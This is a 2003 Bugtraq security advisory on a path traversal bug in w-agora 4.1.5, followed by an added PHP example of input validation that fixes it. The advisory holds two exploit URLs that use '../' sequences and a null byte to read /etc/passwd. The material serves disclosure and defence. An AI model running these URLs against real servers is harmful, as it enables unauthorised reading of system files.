Bugtraq mailing list archives
Bug in w-agora
From: sonyy () 2vias com ar
Date: Sun, 12 Jan 2003 12:03:12 -0300
=======================
==Shell Security Team==
=======================

==============================
====Advisory For W-agora======
==============================

- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovery By Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora

The bug :
==========

index.php

if (empty($bn)) {
    # No forum selected -> default to 'site' configuration
    $site = empty($site) ? "agora" : $site;
    $cfg_file = "${cfg_dir}/site_${site}.${ext}";
    $expnd = "all";
} else {
    $cfg_file = "${cfg_dir}/${bn}.${ext}";
}

Exploit :
=========

index.php
http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00

And modules.php
http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1

Any Question :
==============
Sonyy --> Sonico60 () hotmail com
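
The index.php branch quoted in the advisory builds $cfg_file directly from the request parameters bn and site. The following is an added example, not part of the original post and not w-agora's own code or its actual fix, showing one way to constrain that lookup. resolve_cfg_file(), the 'php' extension and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example, not w-agora code. resolve_cfg_file() is a hypothetical helper;
// $cfg_dir, $ext, $bn and $site are the variable names quoted in the advisory.

function resolve_cfg_file(string $cfg_dir, string $ext, ?string $bn, ?string $site): string
{
    // Same branch as the quoted index.php: no forum selected -> site configuration.
    $name = ($bn === null || $bn === '')
        ? 'site_' . (($site === null || $site === '') ? 'agora' : $site)
        : $bn;

    // Allowlist: plain identifiers only. This rejects "/", "\", "." and the
    // NUL byte (%00) that the advisory's URLs use to cut off ".$ext".
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        throw new InvalidArgumentException('invalid forum or site name');
    }

    // Defence in depth: the resolved path must still sit directly in $cfg_dir.
    $base = realpath($cfg_dir);
    $path = realpath($cfg_dir . '/' . $name . '.' . $ext);
    if ($base === false || $path === false || dirname($path) !== $base) {
        throw new RuntimeException('configuration file not found');
    }
    return $path;
}

// Constructed demo: a temporary config directory with one forum file
// (the 'php' extension is an assumption; the advisory does not give $ext).
$cfg_dir = sys_get_temp_dir() . '/cfg_demo_' . getmypid();
@mkdir($cfg_dir);
file_put_contents("$cfg_dir/fm_d1.php", "<?php // constructed sample config\n");

$inputs = ['fm_d1', "../../../../etc/passwd\0", '../fm_d1', 'fm_d1.php'];
foreach ($inputs as $bn) {
    try {
        $result = 'accepted ' . basename(resolve_cfg_file($cfg_dir, 'php', $bn, 'demos'));
    } catch (Exception $e) {
        $result = 'rejected (' . $e->getMessage() . ')';
    }
    echo json_encode($bn), ' => ', $result, "\n";
}
unlink("$cfg_dir/fm_d1.php");
rmdir($cfg_dir);
```

The allowlist is the primary control; the realpath() containment check only catches cases the pattern would miss if it were later loosened.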